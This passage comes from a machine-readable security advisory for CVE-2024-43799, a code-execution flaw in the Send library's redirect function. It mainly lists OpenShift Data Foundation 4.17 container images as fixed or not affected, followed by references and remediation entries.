"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", 